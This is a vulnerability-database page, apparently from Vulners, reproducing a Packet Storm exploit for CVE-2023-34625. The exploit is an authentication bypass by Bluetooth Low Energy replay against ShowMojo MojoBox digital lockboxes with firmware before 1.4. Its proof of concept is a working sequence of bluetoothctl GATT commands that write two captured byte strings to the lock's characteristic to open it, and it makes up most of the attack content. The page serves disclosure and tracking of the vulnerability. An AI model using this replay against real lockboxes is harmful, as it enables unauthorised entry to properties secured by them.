Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MojoBox BLE Replay Attack

🗓️ 19 Jul 2023 00:00:00Reported by Matteo MandoliniType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 273 Views

MojoBox BLE Replay Attack CVE-2023-3462

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2023-34625
20 Jul 202320:15
attackerkb
Circl		CVE-2023-34625
21 Jul 202300:33
circl
CNNVD		ShowMojo MojoBox Digital Lockbox 安全漏洞
20 Jul 202300:00
cnnvd
CVE		CVE-2023-34625
20 Jul 202300:00
cve
Cvelist		CVE-2023-34625
20 Jul 202300:00
cvelist
EUVD		EUVD-2023-38669
3 Oct 202520:07
euvd
NVD		CVE-2023-34625
20 Jul 202320:15
nvd
Prion		Authentication flaw
20 Jul 202320:15
prion
Vulnrichment		CVE-2023-34625
20 Jul 202300:00
vulnrichment
`# Exploit Title: MojoBox v1.4 BLE replay attack  
# Exploit Author: Matteo Mandolini  
# Date : 15/03/2023  
# Vendor Homepage: https://hello.showmojo.com/mojobox/  
# Version: <1.4  
# CVE: CVE-2023-34625  
  
BLE Replay attack   
  
ShowMojo MojoBox Digital Lockbox with firmware versione prior to 1.4 is vulnerable to authentication bypass. The implementation of the lock  
opening mechanism via Bluetooth Low Energy (BLE) is vulnerable to replay attacks.  
  
PoC:  
[MojoBox-023516]# gatt.select-attribute ff02  
[MojoBox-023516:/service000c/char000f]# gatt.notify on  
[CHG] Attribute /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000f Notifying: yes  
Notify started  
[MojoBox-023516:/service000c/char000d]# gatt.write "0x68 0x01 0x18 0x28 0xFC 0x08 0xE5 0xB9 0xDA 0xDB 0xCE 0x21 0x62 0x1B 0x2A 0xF9 0xBE 0xFB 0x1E 0xE9"  
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d  
[MojoBox-023516:/service000c/char000d]# gatt.write "0xA0 0x13 0xEE 0x11 0x94 0x31 0x7D 0xDB 0x16"  
Attempting to write /org/bluez/hci0/dev_DF_10_10_02_35_16/service000c/char000d  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.00022
mojoboxreplay attackbluetooth low energyauthentication bypass
273